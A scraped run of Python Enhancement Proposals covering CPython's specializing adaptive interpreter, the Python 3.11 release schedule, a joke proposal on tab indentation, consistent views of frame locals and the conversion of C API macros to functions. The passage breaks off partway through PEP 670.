Quickening is the process of replacing slow instructions with faster variants.
Quickened code has a number of advantages over immutable bytecode:
It can be changed at runtime.
It can use super-instructions that span lines and take multiple operands.
It does not need to handle tracing as it can fall back to the original
bytecode for that.
In order that tracing can be supported, the quickened instruction format
should match the immutable, user visible, bytecode format:
16-bit instructions of 8-bit opcode followed by 8-bit operand.
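For reference, that user-visible format can be inspected from Python with the dis module; the snippet below (a minimal sketch for CPython 3.10) decodes a code object into (opcode, operand) byte pairs:
import dis

def add(a, b):
    return a + b

raw = add.__code__.co_code
# Each instruction is two bytes: an opcode followed by an 8-bit operand.
units = [(dis.opname[raw[i]], raw[i + 1]) for i in range(0, len(raw), 2)]
print(units)
# On 3.10 this prints something like:
# [('LOAD_FAST', 0), ('LOAD_FAST', 1), ('BINARY_ADD', 0), ('RETURN_VALUE', 0)]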
Adaptive instructions
Each instruction that would benefit from specialization is replaced by an
adaptive version during quickening. For example,
the LOAD_ATTR instruction would be replaced with LOAD_ATTR_ADAPTIVE.
Each adaptive instruction periodically attempts to specialize itself.
Specialization
CPython bytecode contains many instructions that represent high-level
operations, and would benefit from specialization. Examples include CALL,
LOAD_ATTR, LOAD_GLOBAL and BINARY_ADD.
Introducing a “family” of specialized instructions for each of these
instructions allows effective specialization,
since each new instruction is specialized to a single task.
Each family will include an “adaptive” instruction, that maintains a counter
and attempts to specialize itself when that counter reaches zero.
Each family will also include one or more specialized instructions that
perform the equivalent of the generic operation much faster provided their
inputs are as expected.
Each specialized instruction will maintain a saturating counter which will
be incremented whenever the inputs are as expected. Should the inputs not
be as expected, the counter will be decremented and the generic operation
will be performed.
If the counter reaches the minimum value, the instruction is de-optimized by
simply replacing its opcode with the adaptive version.
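A minimal Python sketch of that counter logic (illustrative only: the saturation limit and helper functions below are hypothetical, and the real mechanism is implemented in C inside the interpreter loop):
SATURATION_LIMIT = 7  # hypothetical upper bound for the saturating counter

def run_specialized(instr):
    if inputs_as_expected(instr):                    # hypothetical guard check
        instr.counter = min(instr.counter + 1, SATURATION_LIMIT)
        return fast_path(instr)                      # hypothetical specialized path
    instr.counter -= 1
    if instr.counter <= 0:
        instr.opcode = instr.adaptive_opcode         # de-optimize back to the adaptive form
    return generic_operation(instr)                  # hypothetical generic fallback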
Ancillary data
Most families of specialized instructions will require more information than
can fit in an 8-bit operand. To support this, a number of 16-bit entries immediately
following the instruction are used to store this data. This is a form of inline
cache, an “inline data cache”. Unspecialized, or adaptive, instructions will
use the first entry of this cache as a counter, and simply skip over the others.
Example families of instructions
LOAD_ATTR
The LOAD_ATTR instruction loads the named attribute of the object on top of the stack,
then replaces the object on top of the stack with the attribute.
This is an obvious candidate for specialization. Attributes might belong to
a normal instance, a class, a module, or one of many other special cases.
LOAD_ATTR would initially be quickened to LOAD_ATTR_ADAPTIVE which
would track how often it is executed, and call the _Py_Specialize_LoadAttr
internal function when executed enough times, or jump to the original
LOAD_ATTR instruction to perform the load. When optimizing, the kind
of the attribute would be examined, and if a suitable specialized instruction
was found, it would replace LOAD_ATTR_ADAPTIVE in place.
Specialization for LOAD_ATTR might include:
LOAD_ATTR_INSTANCE_VALUE A common case where the attribute is stored in
the object’s value array, and not shadowed by an overriding descriptor.
LOAD_ATTR_MODULE Load an attribute from a module.
LOAD_ATTR_SLOT Load an attribute from an object whose
class defines __slots__.
Note how this allows optimizations that complement other optimizations.
The LOAD_ATTR_INSTANCE_VALUE works well with the “lazy dictionary” used for
many objects.
LOAD_GLOBAL
The LOAD_GLOBAL instruction looks up a name in the global namespace
and then, if not present in the global namespace,
looks it up in the builtins namespace.
In 3.9 the C code for LOAD_GLOBAL includes code to check whether the whole
code object should be modified to add a cache, code to check whether either
the global or builtins namespace has changed, code to look up the value in a
cache, and fallback code.
This makes it complicated and bulky.
It also performs many redundant operations even when supposedly optimized.
Using a family of instructions makes the code more maintainable and faster,
as each instruction only needs to handle one concern.
Specializations would include:
LOAD_GLOBAL_ADAPTIVE would operate like LOAD_ATTR_ADAPTIVE above.
LOAD_GLOBAL_MODULE can be specialized for the case where the value is in
the globals namespace. After checking that the keys of the namespace have
not changed, it can load the value from the stored index.
LOAD_GLOBAL_BUILTIN can be specialized for the case where the value is
in the builtins namespace. It needs to check that the keys of the global
namespace have not been added to, and that the builtins namespace has not
changed. Note that we don’t care if the values of the global namespace
have changed, just the keys.
See [4] for a full implementation.
Note
This PEP outlines the mechanisms for managing specialization, and does not
specify the particular optimizations to be applied.
It is likely that details, or even the entire implementation, may change
as the code is further developed.
Compatibility
There will be no change to the language, library or API.
The only way that users will be able to detect the presence of the new
interpreter is through timing execution, the use of debugging tools,
or measuring memory use.
Costs
Memory use
An obvious concern with any scheme that performs any sort of caching is
“how much more memory does it use?”.
The short answer is “not that much”.
Comparing memory use to 3.10
CPython 3.10 uses 2 bytes per instruction, until the execution count
reaches ~2000, when it allocates another byte per instruction and
32 bytes per instruction for those with a cache (LOAD_GLOBAL and LOAD_ATTR).
The following table shows the additional bytes per instruction to support the
3.10 opcache or the proposed adaptive interpreter, on a 64 bit machine.
Version         3.10 cold    3.10 hot    3.11
Specialised     0%           ~15%        ~25%
code            2            2           2
opcache_map     0            1           0
opcache/data    0            4.8         4
Total           2            7.8         6
3.10 cold is before the code has reached the ~2000 limit.
3.10 hot shows the cache use once the threshold is reached.
The relative memory use depends on how much code is “hot” enough to trigger
creation of the cache in 3.10. The break even point, where the memory used
by 3.10 is the same as for 3.11 is ~70%.
It is also worth noting that the actual bytecode is only part of a code
object. Code objects also include names, constants and quite a lot of
debugging information.
In summary, for most applications where many of the functions are relatively
unused, 3.11 will consume more memory than 3.10, but not by much.
Security Implications
None
Rejected Ideas
By implementing a specializing adaptive interpreter with inline data caches,
we are implicitly rejecting many alternative ways to optimize CPython.
However, it is worth emphasizing that some ideas, such as just-in-time
compilation, have not been rejected, merely deferred.
Storing data caches before the bytecode.
An earlier implementation of this PEP for 3.11 alpha used a different caching
scheme as described below:
Quickened instructions will be stored in an array (it is neither necessary nor
desirable to store them in a Python object) with the same format as the
original bytecode. Ancillary data will be stored in a separate array. Each instruction will use 0 or more data entries.
Each instruction within a family must have the same amount of data allocated,
although some instructions may not use all of it.
Instructions that cannot be specialized, e.g. POP_TOP,
do not need any entries.
Experiments show that 25% to 30% of instructions can be usefully specialized.
Different families will need different amounts of data,
but most need 2 entries (16 bytes on a 64 bit machine).
In order to support larger functions than 256 instructions,
we compute the offset of the first data entry for instructions
as (instruction offset)//2 + (quickened operand).
Compared to the opcache in Python 3.10, this design:
is faster; it requires no memory reads to compute the offset.
3.10 requires two reads, which are dependent.
uses much less memory, as the data can be different sizes for different
instruction families, and doesn’t need an additional array of offsets.
can support much larger functions, up to about 5000 instructions
per function. 3.10 can support about 1000.
We rejected this scheme as the inline cache approach is both faster
and simpler.
References
[1] (1, 2)
The construction of high-performance virtual machines for
dynamic languages, Mark Shannon 2011.
https://theses.gla.ac.uk/2975/1/2011shannonphd.pdf
[2]
Dynamic Interpretation for Dynamic Scripting Languages
https://www.scss.tcd.ie/publications/tech-reports/reports.09/TCD-CS-2009-37.pdf
[3]
Inline Caching meets Quickening
https://www.unibw.de/ucsrl/pubs/ecoop10.pdf/view
[4]
The adaptive and specialized instructions are implemented in
https://github.com/python/cpython/blob/main/Python/ceval.c
The optimizations are implemented in:
https://github.com/python/cpython/blob/main/Python/specialize.c
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 659 – Specializing Adaptive Interpreter | Informational | In order to perform well, virtual machines for dynamic languages must
specialize the code that they execute to the types and values in the
program being run. This specialization is often associated with “JIT”
compilers, but is beneficial even without machine code generation. |
PEP 664 – Python 3.11 Release Schedule
Author:
Pablo Galindo Salgado <pablogsal at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
12-Jul-2021
Python-Version:
3.11
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.11.0 schedule
Bugfix releases
3.11 Lifespan
Features for 3.11
Copyright
Abstract
This document describes the development and release schedule for
Python 3.11. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.11 Release Manager: Pablo Galindo Salgado
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.11.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.11 development begins: Monday, 2021-05-03
3.11.0 alpha 1: Tuesday, 2021-10-05
3.11.0 alpha 2: Tuesday, 2021-11-02
3.11.0 alpha 3: Wednesday, 2021-12-08
3.11.0 alpha 4: Friday, 2022-01-14
3.11.0 alpha 5: Thursday, 2022-02-03
3.11.0 alpha 6: Monday, 2022-03-07
3.11.0 alpha 7: Tuesday, 2022-04-05
3.11.0 beta 1: Sunday, 2022-05-08
(No new features beyond this point.)
3.11.0 beta 2: Tuesday, 2022-05-31
3.11.0 beta 3: Wednesday, 2022-06-01
3.11.0 beta 4: Monday, 2022-07-11
3.11.0 beta 5: Tuesday, 2022-07-26
3.11.0 candidate 1: Monday, 2022-08-08
3.11.0 candidate 2: Monday, 2022-09-12
3.11.0 final: Monday, 2022-10-24
Bugfix releases
Actual:
3.11.1: Tuesday, 2022-12-06
3.11.2: Wednesday, 2023-02-08
3.11.3: Wednesday, 2023-04-05
3.11.4: Tuesday, 2023-06-06
3.11.5: Thursday, 2023-08-24
3.11.6: Monday, 2023-10-02
3.11.7: Monday, 2023-12-04
Expected:
3.11.8: Monday, 2024-02-05
Final regular bugfix release with binary installers:
3.11.9: Monday, 2024-04-01
3.11 Lifespan
3.11 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.12.0 final,
the ninth and final 3.11 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.11.0 final, so until approximately
October 2027.
Features for 3.11
Some of the notable features of Python 3.11 include:
PEP 654, Exception Groups and except*.
PEP 657, Enhanced error locations in tracebacks.
PEP 680, Support for parsing TOML in the standard library
Python 3.11 is up to 10-60% faster than Python 3.10. On average, we measured
a 1.25x speedup on the standard benchmark suite. See Faster CPython for
details.
Typing features:
PEP 646, Variadic generics.
PEP 655, Marking individual TypedDict items as required or potentially-missing.
PEP 673, Self type.
PEP 675, Arbitrary literal string type.
PEP 681, Dataclass transforms
Copyright
This document has been placed in the public domain.
| Active | PEP 664 – Python 3.11 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.11. The schedule primarily concerns itself with PEP-sized
items. |
PEP 666 – Reject Foolish Indentation
Author:
Laura Creighton <lac at strakt.com>
Status:
Rejected
Type:
Standards Track
Created:
03-Dec-2001
Python-Version:
2.2
Post-History:
05-Dec-2001
Table of Contents
Abstract
Rationale
References
Copyright
Abstract
Everybody agrees that mixing tabs and spaces is a bad idea. Some
people want more than this. I propose that we let people define
whatever Python behaviour they want, so it will only run the way
they like it, and will not run the way they don’t like it. We
will do this with a command line switch. Programs that aren’t
formatted the way the programmer wants things will raise
IndentationError.
python -TNone will refuse to run when there are any tabs.
python -Tn will refuse to run when tabs are not exactly n spaces
python -TOnly will refuse to run when blocks are indented by anything
other than tabs
People who mix tabs and spaces, naturally, will find that their
programs do not run. Alas, we haven’t found a way to give them an
electric shock as from a cattle prod remotely. (Though if somebody
finds out a way to do this, I will be pleased to add this option to
the PEP.)
Rationale
python-list@python.org (a.k.a. comp.lang.python) is periodically
awash with discussions about tabs and spaces. This is inevitable,
given that indentation is syntactically significant in Python.
This has never solved anything, and just makes various people
frustrated and angry. Eventually they start saying rude things to
each other which is sad for all of us. And it is also sad that
they are wasting their valuable time which they could spend
creating something with Python. Moreover, for the Python community
as a whole, from a public relations point of view, this is quite
unfortunate. The people who aren’t posting about tabs and spaces,
are, (unsurprisingly) invisible, while the people who are posting
make the rest of us look somewhat foolish.
The problem is that there is no polite way to say ‘Stop wasting
your valuable time and mine.’ People who are already in the middle
of a flame war are not well disposed to believe that you are acting
out of compassion for them, and quite rightly insist that their own
time is their own to do with as they please. They are stuck like
flies in treacle in this wretched argument, and it is self-evident
that they cannot disengage or they would have already done so.
But today I had to spend time cleaning my keyboard because the ‘n’
key is sticking. So, in addition to feeling compassion for these
people, I am pretty annoyed. I figure if I make this PEP, we can
then ask Guido to quickly reject it, and then when this argument
next starts up again, we can say ‘Guido isn’t changing things to
suit the tab-haters or the only-tabbers, so this conversation is a
waste of time.’ Then everybody can quietly believe that a) they
are correct and b) other people are fools and c) they are
undeniably fortunate to not have to share a lab with idiots, (which
is something the arguers could do _now_, but apparently have
forgotten).
And python-list can go back to worrying if it is too smug, rather
than whether it is too hostile for newcomers. Possibly somebody
could get around to explaining to me what is the difference between
__getattr__ and __getattribute__ in non-Classic classes in 2.2, a
question I have foolishly posted in the middle of the current tab
thread. I would like to know the answer to that question [1].
This proposal, if accepted, will probably mean a heck of a lot of
work for somebody. But since I don’t want it accepted, I don’t
care.
References
[1]
Tim Peters already has (private correspondence). My early 2.2
didn’t have a __getattribute__, and __getattr__ was
implemented like __getattribute__ now is. This has been
fixed. The important conclusion is that my Decorator Pattern
is safe and all is right with the world.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 666 – Reject Foolish Indentation | Standards Track | Everybody agrees that mixing tabs and spaces is a bad idea. Some
people want more than this. I propose that we let people define
whatever Python behaviour they want, so it will only run the way
they like it, and will not run the way they don’t like it. We
will do this with a command line switch. Programs that aren’t
formatted the way the programmer wants things will raise
IndentationError. |
PEP 667 – Consistent views of namespaces
Author:
Mark Shannon <mark at hotpy.org>
Status:
Draft
Type:
Standards Track
Created:
30-Jul-2021
Python-Version:
3.13
Post-History:
20-Aug-2021
Table of Contents
Abstract
Motivation
Rationale
Specification
Python
C-API
Extensions to the API
Changes to existing APIs
Behavior of f_locals for optimized functions
Backwards Compatibility
Python
C-API
PyEval_GetLocals
PyFrame_FastToLocals, etc.
Implementation
C API
Impact on PEP 709 inlined comprehensions
Comparison with PEP 558
Open Issues
Have locals() return a mapping proxy
Lifetime of the mapping proxy
References
Copyright
Abstract
In early versions of Python all namespaces, whether in functions,
classes or modules, were all implemented the same way: as a dictionary.
For performance reasons, the implementation of function namespaces was
changed. Unfortunately this meant that accessing these namespaces through
locals() and frame.f_locals ceased to be consistent and some
odd bugs crept in over the years as threads, generators and coroutines
were added.
This PEP proposes making these namespaces consistent once more.
Modifications to frame.f_locals will always be visible in
the underlying variables. Modifications to local variables will
immediately be visible in frame.f_locals, and they will be
consistent regardless of threading or coroutines.
The locals() function will act the same as it does now for class
and modules scopes. For function scopes it will return an instantaneous
snapshot of the underlying frame.f_locals.
Motivation
The current implementation of locals() and frame.f_locals is slow,
inconsistent and buggy.
We want to make it faster, consistent, and most importantly fix the bugs.
For example:
class C:
x = 1
sys._getframe().f_locals['x'] = 2
print(x)
prints 2
but:
def f():
x = 1
sys._getframe().f_locals['x'] = 2
print(x)
f()
prints 1
This is inconsistent, and confusing.
With this PEP both examples would print 2.
Worse than that, the current behavior can result in strange bugs [1].
There are no compensating advantages for the current behavior;
it is unreliable and slow.
Rationale
The current implementation of frame.f_locals returns a dictionary
that is created on the fly from the array of local variables.
This can result in the array and dictionary getting out of sync with
each other. Writes to the f_locals may not show up as
modifications to local variables. Writes to local variables can get lost.
By making frame.f_locals return a view on the
underlying frame, these problems go away. frame.f_locals is always in
sync with the frame because it is a view of it, not a copy of it.
Specification
Python
frame.f_locals will return a view object on the frame that
implements the collections.abc.Mapping interface.
For module and class scopes frame.f_locals will be a dictionary,
for function scopes it will be a custom class.
locals() will be defined as:
def locals():
frame = sys._getframe(1)
f_locals = frame.f_locals
if frame.is_function():
f_locals = dict(f_locals)
return f_locals
All writes to the f_locals mapping will be immediately visible
in the underlying variables. All changes to the underlying variables
will be immediately visible in the mapping. The f_locals object will
be a full mapping, and can have arbitrary key-value pairs added to it.
For example:
def l():
"Get the locals of caller"
return sys._getframe(1).f_locals
def test():
if 0: y = 1 # Make 'y' a local variable
x = 1
l()['x'] = 2
l()['y'] = 4
l()['z'] = 5
y
print(locals(), x)
test() will print {'x': 2, 'y': 4, 'z': 5} 2.
In Python 3.10, the above will fail with an UnboundLocalError,
as the definition of y by l()['y'] = 4 is lost.
If the second-to-last line were changed from y to z, this would be a
NameError, as it is today. Keys added to frame.f_locals that are not
lexically local variables remain visible in frame.f_locals, but do not
dynamically become local variables.
C-API
Extensions to the API
Four new C-API functions will be added:
PyObject *PyEval_GetFrameLocals(void)
PyObject *PyEval_GetFrameGlobals(void)
PyObject *PyEval_GetFrameBuiltins(void)
PyObject *PyFrame_GetLocals(PyFrameObject *f)
PyEval_GetFrameLocals() is equivalent to: locals().
PyEval_GetFrameGlobals() is equivalent to: globals().
PyFrame_GetLocals(f) is equivalent to: f.f_locals.
All these functions will return a new reference.
Changes to existing APIs
The following C-API functions will be deprecated, as they return borrowed references:
PyEval_GetLocals()
PyEval_GetGlobals()
PyEval_GetBuiltins()
They will be removed in 3.15.
The following functions should be used instead:
PyEval_GetFrameLocals()
PyEval_GetFrameGlobals()
PyEval_GetFrameBuiltins()
which return new references.
The semantics of PyEval_GetLocals() is changed as it now returns a
view of the frame locals, not a dictionary.
The following three functions will become no-ops, and will be deprecated:
PyFrame_FastToLocalsWithError()
PyFrame_FastToLocals()
PyFrame_LocalsToFast()
They will be removed in 3.15.
Behavior of f_locals for optimized functions
Although f.f_locals behaves as if it were the namespace of the function,
there will be some observable differences.
For example, f.f_locals is f.f_locals may be False.
However f.f_locals == f.f_locals will be True, and
all changes to the underlying variables, by any means, will
always be visible.
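A small sketch of what that would look like, assuming the semantics proposed in this PEP (on current CPython, f_locals for a function frame is a dict snapshot and the last line prints 1 instead):
import sys

def demo():
    x = 1
    frame = sys._getframe()
    a = frame.f_locals
    b = frame.f_locals
    print(a is b)        # False: each access creates a new view object
    print(a == b)        # True: both views reflect the same underlying variables
    a["x"] = 2
    print(x)             # 2 under this PEP: writes through the view are visible immediately

demo()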
Backwards Compatibility
Python
The current implementation has many corner cases and oddities.
Code that works around those may need to be changed.
Code that uses locals() for simple templating, or print debugging,
will continue to work correctly. Debuggers and other tools that use
f_locals to modify local variables, will now work correctly,
even in the presence of threaded code, coroutines and generators.
C-API
PyEval_GetLocals
Because PyEval_GetLocals() returns a borrowed reference, it requires
the dictionary to be cached on the frame, extending its lifetime and
creating a cycle. PyEval_GetFrameLocals() should be used instead.
This code:
locals = PyEval_GetLocals();
if (locals == NULL) {
goto error_handler;
}
Py_INCREF(locals);
should be replaced with:
locals = PyEval_GetFrameLocals();
if (locals == NULL) {
goto error_handler;
}
PyFrame_FastToLocals, etc.
These functions were designed to convert the internal “fast” representation
of the locals variables of a function to a dictionary, and vice versa.
Calls to them are no longer required. C code that directly accesses the
f_locals field of a frame should be modified to call
PyFrame_GetLocals() instead:
PyFrame_FastToLocals(frame);
PyObject *locals = frame.f_locals;
Py_INCREF(locals);
becomes:
PyObject *locals = PyFrame_GetLocals(frame);
if (locals == NULL)
goto error_handler;
Implementation
Each read of frame.f_locals will create a new proxy object that gives
the appearance of being the mapping of local (including cell and free)
variable names to the values of those local variables.
A possible implementation is sketched out below.
All attributes that start with an underscore are invisible and
cannot be accessed directly.
They serve only to illustrate the proposed design.
NULL: Object # NULL is a singleton representing the absence of a value.
class CodeType:
_name_to_offset_mapping_impl: dict | NULL
_cells: frozenset # Set of indexes of cell and free variables
...
def __init__(self, ...):
self._name_to_offset_mapping_impl = NULL
self._variable_names = deduplicate(
self.co_varnames + self.co_cellvars + self.co_freevars
)
...
@property
def _name_to_offset_mapping(self):
"Mapping of names to offsets in local variable array."
if self._name_to_offset_mapping_impl is NULL:
self._name_to_offset_mapping_impl = {
name: index for (index, name) in enumerate(self._variable_names)
}
return self._name_to_offset_mapping_impl
class FrameType:
_locals : array[Object] # The values of the local variables, items may be NULL.
_extra_locals: dict | NULL # Dictionary for storing extra locals not in _locals.
_locals_cache: FrameLocalsProxy | NULL # required to support PyEval_GetLocals()
def __init__(self, ...):
self._extra_locals = NULL
self._locals_cache = NULL
...
@property
def f_locals(self):
return FrameLocalsProxy(self)
class FrameLocalsProxy:
"Implements collections.MutableMapping."
__slots__ "_frame"
def __init__(self, frame:FrameType):
self._frame = frame
def __getitem__(self, name):
f = self._frame
co = f.f_code
if name in co._name_to_offset_mapping:
index = co._name_to_offset_mapping[name]
val = f._locals[index]
if val is NULL:
raise KeyError(name)
if index in co._cells:
val = val.cell_contents
if val is NULL:
raise KeyError(name)
return val
else:
if f._extra_locals is NULL:
raise KeyError(name)
return f._extra_locals[name]
def __setitem__(self, name, val):
f = self._frame
co = f.f_code
if name in co._name_to_offset_mapping:
index = co._name_to_offset_mapping[name]
kind = co._local_kinds[index]
if index in co._cells:
cell = f._locals[index]
cell.cell_contents = val
else:
f._locals[index] = val
else:
if f._extra_locals is NULL:
f._extra_locals = {}
f._extra_locals[name] = val
def __iter__(self):
f = self._frame
co = f.f_code
yield from iter(f._extra_locals)
for index, name in enumerate(co._variable_names):
val = f._locals[index]
if val is NULL:
continue
if index in co._cells:
val = val.cell_contents
if val is NULL:
continue
yield name
def __contains__(self, item):
f = self._frame
if item in f._extra_locals:
return True
return item in f.f_code._variable_names
def __len__(self):
f = self._frame
co = f.f_code
res = 0
for index, _ in enumerate(co._variable_names):
val = f._locals[index]
if val is NULL:
continue
if index in co._cells:
if val.cell_contents is NULL:
continue
res += 1
return len(self._extra_locals) + res
C API
PyEval_GetLocals() will be implemented roughly as follows:
PyObject *PyEval_GetLocals(void) {
PyFrameObject *frame = ...; // Get the current frame.
if (frame->_locals_cache == NULL) {
frame->_locals_cache = PyEval_GetFrameLocals();
}
return frame->_locals_cache;
}
As with all functions that return a borrowed reference, care must be taken to
ensure that the reference is not used beyond the lifetime of the object.
Impact on PEP 709 inlined comprehensions
For inlined comprehensions within a function, locals() currently behaves the
same inside or outside of the comprehension, and this will not change. The
behavior of locals() inside functions will generally change as specified in
the rest of this PEP.
For inlined comprehensions at module or class scope, currently calling
locals() within the inlined comprehension returns a new dictionary for each
call. This PEP will make locals() within a function also always return a new
dictionary for each call, improving consistency; class or module scope inlined
comprehensions will appear to behave as if the inlined comprehension is still a
distinct function.
Comparison with PEP 558
This PEP and PEP 558 share a common goal:
to make the semantics of locals() and frame.f_locals
intelligible, and their operation reliable.
The key difference between this PEP and PEP 558 is that
PEP 558 keeps an internal copy of the local variables,
whereas this PEP does not.
PEP 558 does not specify exactly when the internal copy is
updated, making the behavior of PEP 558 impossible to reason about.
Open Issues
Have locals() return a mapping proxy
An alternative way to define locals() would be simply as:
def locals():
return sys._getframe(1).f_locals
This would be simpler and easier to understand. However,
there would be backwards compatibility issues when locals() is assigned
to a local variable or passed to eval or exec.
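A sketch of the kind of code behind that concern; today locals() returns a snapshot dictionary, so the assertion below holds, but if locals() simply returned the live proxy it would fail:
def f():
    snapshot = locals()          # currently a plain dict, copied at this point
    x = 1                        # a live proxy would expose this assignment retroactively
    assert "x" not in snapshot   # holds today; would fail with a live view
    return snapshot

f()
Code that stores the result of locals(), or passes it to eval() or exec(), relies on this snapshot behaviour.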
Lifetime of the mapping proxy
Each read of the f_locals attributes creates a new mapping proxy.
This is done to avoid creating a reference cycle.
An alternative would be to cache the proxy on the frame, so that
frame.f_locals is frame.f_locals would be true.
The downside of this is that the reference cycle would delay collection
of both the frame and mapping proxy until the next cycle collection.
PyEval_GetLocals() already creates a cycle, as it returns a borrowed reference.
References
[1]
https://bugs.python.org/issue30744
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 667 – Consistent views of namespaces | Standards Track | In early versions of Python all namespaces, whether in functions,
classes or modules, were all implemented the same way: as a dictionary. |
PEP 670 – Convert macros to functions in the Python C API
Author:
Erlend Egeberg Aasland <erlend at python.org>,
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Standards Track
Created:
19-Oct-2021
Python-Version:
3.11
Post-History:
20-Oct-2021,
08-Feb-2022,
22-Feb-2022
Resolution:
Python-Dev thread
Table of Contents
Abstract
Rationale
Specification
Convert macros to static inline functions
Convert static inline functions to regular functions
Cast pointer arguments
Avoid the cast in the limited C API version 3.11
Return type is not changed
Backwards Compatibility
Examples of Macro Pitfalls
Duplication of side effects
Misnesting
Examples of hard to read macros
PyObject_INIT()
_Py_NewReference()
PyUnicode_READ_CHAR()
Macros converted to functions since Python 3.8
Macros converted to static inline functions
Macros converted to regular functions
Static inline functions converted to regular functions
Incompatible changes
Performance concerns and benchmarks
Static inline functions
Debug build
Force inlining
Disabling inlining
Rejected Ideas
Keep macros, but fix some macro issues
Post History
References
Version History
Copyright
Abstract
Macros in the C API will be converted to static inline functions or
regular functions. This will help avoid macro pitfalls in C/C++, and
make the functions usable from other programming languages.
To avoid compiler warnings, function arguments of pointer types
will be cast to appropriate types using additional macros.
The cast will not be done in the limited C API version 3.11:
users who opt in to the new limited API may need to add casts to
the exact expected type.
To avoid introducing incompatible changes, macros which can be used as
l-value in an assignment will not be converted.
Rationale
The use of macros may have unintended adverse effects that are hard to
avoid, even for experienced C developers. Some issues have been known
for years, while others have been discovered recently in Python.
Working around macro pitfalls makes the macro code harder to read and
to maintain.
Converting macros to functions has multiple advantages:
Functions don’t suffer from macro pitfalls, for example the following
ones described in GCC documentation:
Misnesting
Operator precedence problems
Swallowing the semicolon
Duplication of side effects
Self-referential macros
Argument prescan
Newlines in arguments
Functions don’t need the following workarounds for macro
pitfalls, making them usually easier to read and to maintain than
similar macro code:
Adding parentheses around arguments.
Using line continuation characters if the function is written on
multiple lines.
Adding commas to execute multiple expressions.
Using do { ... } while (0) to write multiple statements.
Argument types and the return type of functions are well defined.
Debuggers and profilers can retrieve the name of inlined functions.
Debuggers can put breakpoints on inlined functions.
Variables have a well-defined scope.
Converting macros and static inline functions to regular functions makes
these regular functions accessible to projects which use Python but
cannot use macros and static inline functions.
Specification
Convert macros to static inline functions
Most macros will be converted to static inline functions.
The following macros will not be converted:
Object-like macros (i.e. those which don’t need parentheses and
arguments). For example:
Empty macros. Example: #define Py_HAVE_CONDVAR.
Macros only defining a value, even if a constant with a well defined
type would be better. Example: #define METH_VARARGS 0x0001.
Compatibility layer for different C compilers, C language extensions,
or recent C features.
Example: Py_GCC_ATTRIBUTE(), Py_ALWAYS_INLINE, Py_MEMCPY().
Macros used for definitions rather than behavior.
Example: PyAPI_FUNC, Py_DEPRECATED, Py_PYTHON_H.
Macros that need C preprocessor features, like stringification and
concatenation. Example: Py_STRINGIFY().
Macros which cannot be converted to functions. Examples:
Py_BEGIN_ALLOW_THREADS (contains an unpaired }), Py_VISIT
(relies on specific variable names), Py_RETURN_RICHCOMPARE (returns
from the calling function).
Macros which can be used as an l-value in assignments. This would be
an incompatible change and is out of the scope of this PEP.
Example: PyBytes_AS_STRING().
Macros which have different return types depending on the code path
or arguments.
Convert static inline functions to regular functions
Static inline functions in the public C API may be converted to regular
functions, but only if there is no measurable performance impact of
changing the function.
The performance impact should be measured with benchmarks.
Cast pointer arguments
Currently, most macros accepting pointers cast pointer arguments to
their expected types. For example, in Python 3.6, the Py_TYPE()
macro casts its argument to PyObject*:
#define Py_TYPE(ob) (((PyObject*)(ob))->ob_type)
The Py_TYPE() macro accepts the PyObject* type, but also any
pointer types, such as PyLongObject* and PyDictObject*.
Functions are strongly typed, and can only accept one type of argument.
To avoid compiler errors and warnings in existing code, when a macro is
converted to a function and the macro casts at least one of its arguments,
a new macro will be added to keep the cast. The new macro
and the function will have the same name.
Example with the Py_TYPE()
macro converted to a static inline function:
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
return ob->ob_type;
}
#define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
The cast is kept for all pointer types, not only PyObject*.
This includes casts to void*: removing a cast to void* would emit
a new warning if the function is called with a const void* variable.
For example, the PyUnicode_WRITE() macro casts its data argument to
void*, and so it currently accepts const void* type, even though
it writes into data. This PEP will not change this.
Avoid the cast in the limited C API version 3.11
The casts will be excluded from the limited C API version 3.11 and newer.
When an API user opts into the new limited API, they must pass the expected
type or perform the cast.
As an example, Py_TYPE() will be defined like this:
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
return ob->ob_type;
}
#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 < 0x030b0000
# define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
#endif
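With the limited C API version 3.11, a caller whose pointer has a more specific type then performs the cast explicitly; an illustrative sketch (self is a made-up variable of some non-PyObject* type):
/* Illustrative sketch: 'self' stands for any pointer that is not PyObject*. */
PyTypeObject *tp = Py_TYPE((PyObject *)self);   /* explicit cast by the caller */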
Return type is not changed
When a macro is converted to a function, its return type must not change
to prevent emitting new compiler warnings.
For example, Python 3.7 changed the return type of PyUnicode_AsUTF8()
from char* to const char* (commit).
The change emitted new compiler warnings when building C extensions
expecting char*. This PEP doesn’t change the return type to prevent
this issue.
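As a hedged illustration of the kind of warning this policy avoids (obj is a made-up variable holding a Unicode object):
/* Illustrative only.  Code written for the old char* return type now
   triggers a warning such as "initialization discards 'const' qualifier"
   against the const char* return type used since Python 3.7. */
char *data = PyUnicode_AsUTF8(obj);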
Backwards Compatibility
The PEP is designed to avoid C API incompatible changes.
Only C extensions explicitly targeting the limited C API version 3.11
must now pass the expected types to functions: pointer arguments are no
longer cast to the expected types.
Function arguments of pointer types are still cast and return types are
not changed to prevent emitting new compiler warnings.
Macros which can be used as l-value in an assignment are not modified by
this PEP to avoid incompatible changes.
Examples of Macro Pitfalls
Duplication of side effects
Macros:
#define PySet_Check(ob) \
(Py_IS_TYPE(ob, &PySet_Type) \
|| PyType_IsSubtype(Py_TYPE(ob), &PySet_Type))
#define Py_IS_NAN(X) ((X) != (X))
If the ob or the X argument has a side effect, the side effect is
duplicated: it is executed twice by PySet_Check() and Py_IS_NAN().
